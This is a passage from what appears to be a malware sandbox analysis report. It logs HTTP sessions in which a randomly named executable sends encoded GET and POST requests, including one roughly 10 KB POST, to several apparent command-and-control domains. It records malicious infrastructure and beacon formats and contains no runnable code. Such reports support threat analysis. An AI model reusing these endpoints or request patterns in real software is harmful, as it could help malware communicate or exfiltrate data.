                                                                                                                    Data Ascii: AHkx=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83KxXG/Mt6Q7LrR236HxeG4xnGerkf2QrGNsmpMf+FoSswURO/qHnb0WDgw3d2DIe5slSsFR0jWHmXEAAC7mfhK8Bxm8stw0KCyyOLC22EW0UyHO+zOiAwriVWDpyKEktT2D9M7MG9LlQGK+fJSLC4vi5FG7I/61YxQ3WlKKzKwTyBKDdaQ1y2e0G3O9xOR2gdnkkvHKPWU9FRn4ZhytnV1joAC1tUCDH+sU3FyPthFDdmPiNYP8yIxss8MLWY1oq0EA7zyne3s6FYEpuZfz/dMr2rwQPr+jGTTNFYKYJ1R4b92/XUpswHJr4aWYJEmzCX41bPkk6LEefA566mbxQm6EpDlQeXBD9C+wNMvymG27O6GXsAcLW5ZwR4G91/QVxz92n5pxf4LwriIx7bt4L2SsIk4Xyl0IuidON3LnvDPtFJitZhIqg+7NIEtAz5Q20K6jeOAOiw1GSsz3MRviz3FlbDHXaI5MC943vCISH3C5Vq/PFWVMP4Qbz8ukslhIivpiSXDz0lDRTI3WgTtLgxDx0yltdn+EtVHMGnEDpHrraLoIEc1pAi58ppS6Lm5nxjC7EZ83i9GNeTxsWF8k3+M6M47LV/FPweVhqPY7mX+Vqy5kjUuhXC5nkyVzznarqsr+BmGhHJgbi05lZ3lNacUbDtFtH9RM4PnW1K7RabYgmNOTyNTpugN5+AVaqYhWG0C+N4PVyoe8qQhKcNz9oxQ89TieTJBcSDeNnec3tnsGeNXZI+d05Jvc81XnrP9ILF64Po9fTnIRo6F0lZuGgF2x6XEf4P3gf29OkfXwfUPNU/tx9DIgZ91sS5YRF9rFc3NmvdtO8zx6G7KT7/qWff7eGyCYmkp71yoGt3VHpOis+nRtve2WIgMcFOhlKEZD7w57bjN+KsjvFhmYS18ipFszbKppMwi+5zV42oLYuYZefb9rzqcaBHgpI3EwfJ9YMEW6ZiqWe [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:21:03.191891909 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    28192.168.2.449647154.212.219.2803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:04.859318018 CEST465OUTGET /6wpo/?AHkx=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:05.895066977 CEST289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:21:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.449648133.130.35.90803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:12.227118969 CEST716OUTPOST /p9u3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.komart.shop
                                                                                                                    Origin: http://www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.komart.shop/p9u3/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 45 64 4a 4a 52 67 74 70 74 58 56 73 4e 6a 49 72 36 62 4f 67 38 4d 39 38 47 63 75 49 68 53 7a 6f 4f 54 4b 4a 49 50 6b 6a 30 36 52 6d 6c 46 33 54 65 61 71 62 51 42 4d 6d 57 56 69 6c 6b 70 78 31 55 79 4d 6c 63 4b 46 53 2f 65 77 59 71 68 6a 56 41 78 6e 50 38 42 71 2b 51 69 53 78 42 39 47 73 45 56 4b 67 59 56 38 76 31 4b 33 55 5a 50 53 54 55 57 74 63 30 35 71 43 52 4a 74 42 41 38 67 78 35 48 4a 70 4e 30 31 41 78 77 65 56 43 52 75 35 6a 53 4b 66 6b 7a 6b 42 57 2b 66 61 38 37 56 78 63 63 32 79 72 71 66 51 57 39 54 4b 62 45 6e 66 41 6f 58 58 51 67 3d 3d
                                                                                                                    Data Ascii: AHkx=O3h880Jaoet1EdJJRgtptXVsNjIr6bOg8M98GcuIhSzoOTKJIPkj06RmlF3TeaqbQBMmWVilkpx1UyMlcKFS/ewYqhjVAxnP8Bq+QiSxB9GsEVKgYV8v1K3UZPSTUWtc05qCRJtBA8gx5HJpN01AxweVCRu5jSKfkzkBW+fa87Vxcc2yrqfQW9TKbEnfAoXXQg==
                                                                                                                    Oct 9, 2024 14:21:13.023412943 CEST668INHTTP/1.1 404 Not Found
                                                                                                                    content-encoding: gzip
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:12 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 454
                                                                                                                    connection: close
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                    Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.449649133.130.35.90803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:14.768416882 CEST736OUTPOST /p9u3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.komart.shop
                                                                                                                    Origin: http://www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.komart.shop/p9u3/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 4c 6f 41 52 69 4a 50 36 49 6a 33 36 52 6d 74 6c 33 57 54 36 71 41 51 42 77 75 57 58 6d 6c 6b 70 6c 31 55 79 38 6c 63 5a 74 4e 2b 4f 77 67 6c 42 6a 54 4f 52 6e 50 38 42 71 2b 51 6d 36 4c 42 35 53 73 45 6c 36 67 65 33 55 6f 72 36 33 58 51 76 53 54 51 57 74 59 30 35 72 58 52 49 68 72 41 2b 6f 78 35 48 35 70 4e 67 70 44 34 77 65 66 63 68 76 4f 6b 6a 2f 4e 39 7a 4e 4e 62 66 48 75 33 4c 4a 6d 55 36 6e 6f 36 62 2b 48 45 39 33 35 47 44 75 72 4e 72 71 65 4c 6a 6f 2f 62 48 61 74 41 6f 41 5a 45 4e 79 4c 47 32 39 37 76 72 34 3d
                                                                                                                    Data Ascii: AHkx=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkLoARiJP6Ij36Rmtl3WT6qAQBwuWXmlkpl1Uy8lcZtN+OwglBjTORnP8Bq+Qm6LB5SsEl6ge3Uor63XQvSTQWtY05rXRIhrA+ox5H5pNgpD4wefchvOkj/N9zNNbfHu3LJmU6no6b+HE935GDurNrqeLjo/bHatAoAZENyLG297vr4=
                                                                                                                    Oct 9, 2024 14:21:15.543420076 CEST668INHTTP/1.1 404 Not Found
                                                                                                                    content-encoding: gzip
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:15 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 454
                                                                                                                    connection: close
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                    Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.449650133.130.35.90803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:17.319358110 CEST10818OUTPOST /p9u3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.komart.shop
                                                                                                                    Origin: http://www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.komart.shop/p9u3/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 44 6f 41 67 43 4a 4d 5a 51 6a 32 36 52 6d 79 56 33 58 54 36 72 43 51 46 63 71 57 58 71 31 6b 72 64 31 53 51 30 6c 49 34 74 4e 77 4f 77 67 39 42 6a 53 41 78 6d 53 38 46 4f 79 51 69 6d 4c 42 35 53 73 45 6d 69 67 65 6c 38 6f 70 36 33 55 5a 50 53 50 55 57 74 77 30 35 79 73 52 49 31 52 41 50 49 78 35 6e 70 70 50 56 31 44 6c 41 65 52 64 68 76 57 6b 6a 69 54 39 7a 52 72 62 66 69 37 33 4a 56 6d 58 4e 57 4e 76 50 4f 48 65 4d 4c 32 55 6b 43 6f 4b 70 2b 75 44 77 55 42 62 6b 61 71 54 4a 51 73 44 74 58 75 57 55 68 34 37 76 6b 2f 35 75 75 63 62 55 54 54 64 38 59 4b 57 4f 56 56 73 2f 4c 56 55 66 62 71 42 71 46 79 42 6b 2f 58 7a 6f 37 6e 4f 37 2b 44 6e 48 6f 69 36 75 55 76 35 2b 2f 2b 39 43 79 49 4a 67 65 33 31 52 71 46 79 4a 77 37 66 77 6d 67 36 4e 49 5a 74 74 72 32 66 37 50 70 46 76 54 68 4d 56 4c 6f 61 77 52 79 62 75 73 6c 75 66 43 43 68 5a 6f 47 65 30 2b 2b 63 41 63 72 73 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkDoAgCJMZQj26RmyV3XT6rCQFcqWXq1krd1SQ0lI4tNwOwg9BjSAxmS8FOyQimLB5SsEmigel8op63UZPSPUWtw05ysRI1RAPIx5nppPV1DlAeRdhvWkjiT9zRrbfi73JVmXNWNvPOHeML2UkCoKp+uDwUBbkaqTJQsDtXuWUh47vk/5uucbUTTd8YKWOVVs/LVUfbqBqFyBk/Xzo7nO7+DnHoi6uUv5+/+9CyIJge31RqFyJw7fwmg6NIZttr2f7PpFvThMVLoawRybuslufCChZoGe0++cAcrsXtuRnpY76CD6a+nwIUcoT+szmj1TZAERMBsMbHx2/3oCe1hRX+1O1L5hnpX0/nw71sKHPeVBCDLkOlTdiP/t9Umfp5ZlKqv+JLP1eFa862B720Ns5XcK81Bhd0LQdRZFNCXFth3fnnx8QSOzxU0l8wbOMtk9FV1Icc7Ds6YeJdfdMWT2fSgUTzQ+sr0PPRXbWTzwB7dxSxnRFqhTLuMxYJDaIp7MZefRUmNbjCJU/DrmGXT//LlYxgP39pk4HeaWOS/ezCeO4AySCslv8VDpXMczGtne0EunvoGxwp+szy52EESFy5Dk2tsF6yUNeooDtSfsGP5+bae14py8AQ2sUJp2Qoh7QYg615UrCo2UpAcRnh+D3Dv0oIkZkxgcuNdvimCcoaLFLSJCv4qfD+aukaZqXF4Xp6iBC5/rEs5FveGnYgqSiEeZ5Z04W/RTmKxD3qFn+wBe77DsDt5+ROr4pbFzy4VNcX5l3aWLKg/nFBnbVetMb6/MQDBcE4rDnUbhZ93Yg+oWtGCcRmgarUIhFAFzQSaLNRGOaFDK5CBw1WELsuB0gh8sdTV441q4Dc76VsYIbjPQ4ZfU6+cdZA/jZq7+E2XqxR2uE4gyYDryjcf4OPpsQ6Ad79mJjKJhqK5d1anDHXiBx5So5xi8Rg31Z6gAzyJJmZTlel [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:21:18.270903111 CEST668INHTTP/1.1 404 Not Found
                                                                                                                    content-encoding: gzip
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:18 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 454
                                                                                                                    connection: close
                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                    Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.449651133.130.35.90803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:19.862317085 CEST461OUTGET /p9u3/?AHkx=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.komart.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:21:20.647305965 CEST883INHTTP/1.1 404 Not Found
                                                                                                                    content-type: text/html
                                                                                                                    date: Wed, 09 Oct 2024 12:21:20 GMT
                                                                                                                    etag: W/"66fe0220-2b5"
                                                                                                                    server: nginx
                                                                                                                    vary: Accept-Encoding
                                                                                                                    content-length: 693
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.4496523.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:25.880536079 CEST746OUTPOST /u6k6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.healthyloveforall.net
                                                                                                                    Origin: http://www.healthyloveforall.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.healthyloveforall.net/u6k6/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 63 70 41 36 63 50 56 4a 45 6c 65 50 69 6f 6a 76 35 2f 48 65 52 34 52 6b 37 66 36 34 68 43 56 51 4f 49 76 76 35 57 71 4e 6b 32 4a 2b 57 51 51 52 2f 42 79 2b 6b 36 61 2f 33 35 34 52 44 67 58 45 32 52 6f 31 30 50 4c 35 59 41 64 33 36 34 67 58 50 72 53 2f 51 71 2f 44 35 30 30 54 57 2b 4e 31 51 79 76 36 37 70 44 73 48 2b 6e 6b 7a 77 38 5a 34 58 54 68 69 31 54 36 33 72 39 36 55 4e 4b 52 70 70 46 69 49 45 67 6e 61 62 2b 71 4a 75 38 4d 68 41 50 46 71 4e 71 4e 44 59 46 68 70 6e 79 6c 55 65 38 4b 35 70 38 2b 63 6c 65 64 77 36 36 50 7a 69 4d 44 36 41 3d 3d
                                                                                                                    Data Ascii: AHkx=QaRrc21L6/AMcpA6cPVJElePiojv5/HeR4Rk7f64hCVQOIvv5WqNk2J+WQQR/By+k6a/354RDgXE2Ro10PL5YAd364gXPrS/Qq/D500TW+N1Qyv67pDsH+nkzw8Z4XThi1T63r96UNKRppFiIEgnab+qJu8MhAPFqNqNDYFhpnylUe8K5p8+cledw66PziMD6A==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.4496533.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:21:29.395062923 CEST766OUTPOST /u6k6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.healthyloveforall.net
                                                                                                                    Origin: http://www.healthyloveforall.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.healthyloveforall.net/u6k6/
